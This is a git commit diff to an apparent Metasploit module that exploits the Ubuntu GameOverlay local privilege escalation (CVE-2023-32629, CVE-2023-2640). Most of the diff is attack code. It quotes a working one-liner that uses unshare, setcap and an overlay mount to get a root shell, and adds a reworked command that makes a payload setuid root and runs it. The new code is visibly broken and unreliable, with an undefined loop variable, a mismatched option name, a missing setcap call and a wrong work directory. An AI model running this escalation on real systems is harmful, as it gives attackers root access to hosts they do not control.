Include cmd_stage module, add generate_payload_exe, run payload in new namespace

Corey · Corey · commit 73f6e764898c · 2024-09-07T07:13:29.000-04:00
diff --git a/modules/exploits/linux/local/game_overlay_privesc.rb b/modules/exploits/linux/local/game_overlay_privesc.rb
@@ -4,7 +4,8 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Linux::System
   include Msf::Post::Linux::Kernel
   include Msf::Post::File
-  include Msf::Exploit::FileDropper
+  include Msf::Exploit::FileDropper 
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -39,17 +40,14 @@ def initialize(info = {})
           ['CVE', '2023-32629'],
           ['CVE', '2023-2640']
         ],
-        'Targets' => [
-          # TODO add linux sillicon
-          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
-          [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
-          [ 'Python', { 'Arch' => ARCH_PYTHON, 'Platform' => 'python' } ]
-        ],
-        'DefaultTarget' => 0
+      'Targets'         => [ [ 'Linux', {} ] ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'CmdStagerFlavor' => 'bourne' 
       )
     )
     register_options [
-      OptString.new('PayloadFilename', [true, 'Name of payload file', 'marv.elf'])
+      OptString.new('PayloadDir', [true, 'Directory to store payload.', '/tmp/sysdtest/']),
+      OptString.new('PayloadFileName', [true, 'Name of payloadf', 'marv.elf'])
     ]
   end
 
@@ -102,27 +100,40 @@ def check
     end
   end
 
-  def exploit
-    # Still need to figure out if meterpreter or shell can interact with the spawned process 
-    # So we can run a shell without having to drop a new executable
+  def execute_command(cmd, opts = {})
     payload_file = datastore['PayloadFilename']
-    register_file_for_cleanup payload
 
-    # Write payload file
-    print_status "payload_file: #{payload_file}"
+    payload_dir = datastore['PayloadDir']
+
+    directories = %w[low up wrk mnt].flat_map {|e| "/tmp/main/#{e}"}
+
+    # Should we make sure directory doesn't already exist?
+
+    directories.each do |dir|
+      print_status "Creating directory #{d}"
+      cmd_exec "mkdir -p #{d}"
+      register_dir_for_cleanup d
+    end
+
+
+   write_file "/tmp/main/marv", generate_payload_exe
+   #works move test to low, run unshare mount set cap, shell
+
+   print_status "Copying python"
+   cmd_exec "cp /u*/b*/p*3 /tmp/main/low"
 
-    #Failure::BadConfig "#{payload_file} already exists" if file? payload_file
-    #Failure::BadConfig "Current directory isn't writeable" unless writable? '.' 
+   print_status "Starting new namespace, and running exploit..."
 
-    write_file payload_file, generate_payload.generate
+   hack = "unshare -rm sh -c \"cap_setuid+eip /tmp/main/low/python3; mount -t overlay overlay -o rw, lowerdir=/tmp/main/low,upperdir=/tmp/main/up,workdir=/tmp/main/work mnt touch mnt/* && /tmp/main/up/python3 -c 'import os;os.setuid(0);os.system(\"chown root:root /tmp/main/low/marv && chmod u+s /tmp/main/low/marv && /tmp/main/marv\")\" "
 
-    # run shell in a different namespace, add setuid capabilities and create a new mount point 
-    # Based on g1vi exploit: "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
-    hack = "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
-    #"unshare -rm sh -c \"mkdir l u w m && cp #{payload_file} l/; setcap cap_setuid+eip l/#{payload_file}; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; && chmod 4755 /u/#{payload_file} && /u/#{payload_file}" # && rm -rf l/ m/ u/ w/ #{payload} }
-    
-    print_status("Running exploit '#{hack}'")
+    # g1vi original 
+    # "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
+    print_status "Running exploit: '#{hack}' "
     cmd_exec hack
+  end 
+
+  def exploit
+    execute_cmdstager
   end
 
 end
